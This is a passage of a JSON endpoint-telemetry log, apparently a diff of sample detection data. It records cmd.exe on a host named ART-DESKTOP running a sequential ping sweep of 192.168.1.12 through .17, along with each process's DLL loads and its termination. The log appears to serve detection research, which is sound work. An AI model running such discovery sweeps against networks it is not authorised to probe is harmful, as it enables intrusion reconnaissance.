"PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572036990000, - "unique_pid": "{42FC7E13-CB53-5C05-0000-0010F9875101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6288, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572036990000, - "unique_pid": "{42FC7E13-CB53-5C05-0000-0010F9875101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6288, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572036990000, - "unique_pid": "{42FC7E13-CB53-5C05-0000-0010F9875101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6288, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572036990000, - "unique_pid": 
"{42FC7E13-CB53-5C05-0000-0010F9875101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6288, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572036990000, - "unique_pid": "{42FC7E13-CB53-5C05-0000-0010F9875101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6288, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572036990000, - "unique_pid": "{42FC7E13-CB53-5C05-0000-0010F9875101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6288, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572036990000, - "unique_pid": "{42FC7E13-CB53-5C05-0000-0010F9875101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6288, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572036990000, - "unique_pid": "{42FC7E13-CB53-5C05-0000-0010F9875101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6288, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572036990000, - "unique_pid": "{42FC7E13-CB53-5C05-0000-0010F9875101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6288, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572036990000, - "unique_pid": "{42FC7E13-CB53-5C05-0000-0010F9875101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": 
"C:\\Windows\\System32\\mswsock.dll", - "pid": 6288, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572036990000, - "unique_pid": "{42FC7E13-CB53-5C05-0000-0010F9875101}" - }, - { - "event_type": "process", - "pid": 6288, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572041990000, - "unique_pid": "{42FC7E13-CB53-5C05-0000-0010F9875101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.12", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1688, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572042130000, - "unique_pid": "{42FC7E13-CB54-5C05-0000-0010788A5101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 1688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572041990000, - "unique_pid": "{42FC7E13-CB54-5C05-0000-0010788A5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572042140000, - "unique_pid": "{42FC7E13-CB54-5C05-0000-0010788A5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572042140000, - "unique_pid": "{42FC7E13-CB54-5C05-0000-0010788A5101}" - }, - { 
- "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572042140000, - "unique_pid": "{42FC7E13-CB54-5C05-0000-0010788A5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572042140000, - "unique_pid": "{42FC7E13-CB54-5C05-0000-0010788A5101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 1688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572042140000, - "unique_pid": "{42FC7E13-CB54-5C05-0000-0010788A5101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 1688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572042140000, - "unique_pid": "{42FC7E13-CB54-5C05-0000-0010788A5101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 1688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572042140000, - "unique_pid": "{42FC7E13-CB54-5C05-0000-0010788A5101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 1688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572042140000, - "unique_pid": "{42FC7E13-CB54-5C05-0000-0010788A5101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 
1688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572042140000, - "unique_pid": "{42FC7E13-CB54-5C05-0000-0010788A5101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 1688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572042140000, - "unique_pid": "{42FC7E13-CB54-5C05-0000-0010788A5101}" - }, - { - "event_type": "process", - "pid": 1688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572046830000, - "unique_pid": "{42FC7E13-CB54-5C05-0000-0010788A5101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.13", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1340, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572047029984, - "unique_pid": "{42FC7E13-CB54-5C05-0000-0010F78C5101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 1340, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572046990000, - "unique_pid": "{42FC7E13-CB54-5C05-0000-0010F78C5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1340, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572046990000, - "unique_pid": "{42FC7E13-CB54-5C05-0000-0010F78C5101}" - }, - { - "event_type": "image_load", - "image_name": 
"kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1340, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572046990000, - "unique_pid": "{42FC7E13-CB54-5C05-0000-0010F78C5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1340, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572046990000, - "unique_pid": "{42FC7E13-CB54-5C05-0000-0010F78C5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1340, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572046990000, - "unique_pid": "{42FC7E13-CB54-5C05-0000-0010F78C5101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 1340, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572046990000, - "unique_pid": "{42FC7E13-CB54-5C05-0000-0010F78C5101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 1340, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572046990000, - "unique_pid": "{42FC7E13-CB54-5C05-0000-0010F78C5101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 1340, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572046990000, - "unique_pid": "{42FC7E13-CB54-5C05-0000-0010F78C5101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 1340, - "process_name": "PING.EXE", 
- "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572046990000, - "unique_pid": "{42FC7E13-CB54-5C05-0000-0010F78C5101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 1340, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572046990000, - "unique_pid": "{42FC7E13-CB54-5C05-0000-0010F78C5101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 1340, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572046990000, - "unique_pid": "{42FC7E13-CB54-5C05-0000-0010F78C5101}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883572049020000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883572049020000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - 
"timestamp": 131883572049020000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "process", - "pid": 1340, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572051990000, - "unique_pid": "{42FC7E13-CB54-5C05-0000-0010F78C5101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.14", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3452, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572052140000, - "unique_pid": "{42FC7E13-CB55-5C05-0000-0010C8905101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3452, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572052140000, - "unique_pid": "{42FC7E13-CB55-5C05-0000-0010C8905101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3452, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572052140000, - "unique_pid": "{42FC7E13-CB55-5C05-0000-0010C8905101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3452, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572052140000, - "unique_pid": "{42FC7E13-CB55-5C05-0000-0010C8905101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3452, - 
"process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572052140000, - "unique_pid": "{42FC7E13-CB55-5C05-0000-0010C8905101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3452, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572052140000, - "unique_pid": "{42FC7E13-CB55-5C05-0000-0010C8905101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3452, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572052140000, - "unique_pid": "{42FC7E13-CB55-5C05-0000-0010C8905101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3452, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572052140000, - "unique_pid": "{42FC7E13-CB55-5C05-0000-0010C8905101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3452, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572052140000, - "unique_pid": "{42FC7E13-CB55-5C05-0000-0010C8905101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3452, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572052140000, - "unique_pid": "{42FC7E13-CB55-5C05-0000-0010C8905101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3452, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572052140000, - 
"unique_pid": "{42FC7E13-CB55-5C05-0000-0010C8905101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3452, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572052140000, - "unique_pid": "{42FC7E13-CB55-5C05-0000-0010C8905101}" - }, - { - "event_type": "process", - "pid": 3452, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572056840000, - "unique_pid": "{42FC7E13-CB55-5C05-0000-0010C8905101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.15", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5572, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572056980000, - "unique_pid": "{42FC7E13-CB55-5C05-0000-001044935101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5572, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572056990000, - "unique_pid": "{42FC7E13-CB55-5C05-0000-001044935101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5572, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572056990000, - "unique_pid": "{42FC7E13-CB55-5C05-0000-001044935101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5572, - "process_name": "PING.EXE", - 
"process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572056990000, - "unique_pid": "{42FC7E13-CB55-5C05-0000-001044935101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5572, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572056990000, - "unique_pid": "{42FC7E13-CB55-5C05-0000-001044935101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5572, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572056990000, - "unique_pid": "{42FC7E13-CB55-5C05-0000-001044935101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5572, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572056990000, - "unique_pid": "{42FC7E13-CB55-5C05-0000-001044935101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5572, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572056990000, - "unique_pid": "{42FC7E13-CB55-5C05-0000-001044935101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5572, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572056990000, - "unique_pid": "{42FC7E13-CB55-5C05-0000-001044935101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5572, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572056990000, - "unique_pid": 
"{42FC7E13-CB55-5C05-0000-001044935101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5572, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572056990000, - "unique_pid": "{42FC7E13-CB55-5C05-0000-001044935101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5572, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572056990000, - "unique_pid": "{42FC7E13-CB55-5C05-0000-001044935101}" - }, - { - "event_type": "process", - "pid": 5572, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572061990000, - "unique_pid": "{42FC7E13-CB55-5C05-0000-001044935101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.16", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6380, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572062140000, - "unique_pid": "{42FC7E13-CB56-5C05-0000-001092975101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6380, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572062140000, - "unique_pid": "{42FC7E13-CB56-5C05-0000-001092975101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6380, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572062140000, - "unique_pid": "{42FC7E13-CB56-5C05-0000-001092975101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6380, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572062140000, - "unique_pid": "{42FC7E13-CB56-5C05-0000-001092975101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6380, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572062140000, - "unique_pid": "{42FC7E13-CB56-5C05-0000-001092975101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6380, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572062140000, - "unique_pid": "{42FC7E13-CB56-5C05-0000-001092975101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6380, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572062140000, - "unique_pid": "{42FC7E13-CB56-5C05-0000-001092975101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6380, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572062140000, - "unique_pid": "{42FC7E13-CB56-5C05-0000-001092975101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6380, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572062140000, - "unique_pid": 
"{42FC7E13-CB56-5C05-0000-001092975101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6380, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572062140000, - "unique_pid": "{42FC7E13-CB56-5C05-0000-001092975101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6380, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572062140000, - "unique_pid": "{42FC7E13-CB56-5C05-0000-001092975101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6380, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572062140000, - "unique_pid": "{42FC7E13-CB56-5C05-0000-001092975101}" - }, - { - "event_type": "process", - "pid": 6380, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572066840000, - "unique_pid": "{42FC7E13-CB56-5C05-0000-001092975101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.17", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4864, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572066990000, - "unique_pid": "{42FC7E13-CB56-5C05-0000-00107D9A5101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4864, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572066990000, - "unique_pid": "{42FC7E13-CB56-5C05-0000-00107D9A5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4864, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572066990000, - "unique_pid": "{42FC7E13-CB56-5C05-0000-00107D9A5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4864, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572066990000, - "unique_pid": "{42FC7E13-CB56-5C05-0000-00107D9A5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4864, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572066990000, - "unique_pid": "{42FC7E13-CB56-5C05-0000-00107D9A5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4864, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572066990000, - "unique_pid": "{42FC7E13-CB56-5C05-0000-00107D9A5101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4864, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572066990000, - "unique_pid": "{42FC7E13-CB56-5C05-0000-00107D9A5101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4864, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572066990000, - "unique_pid": 
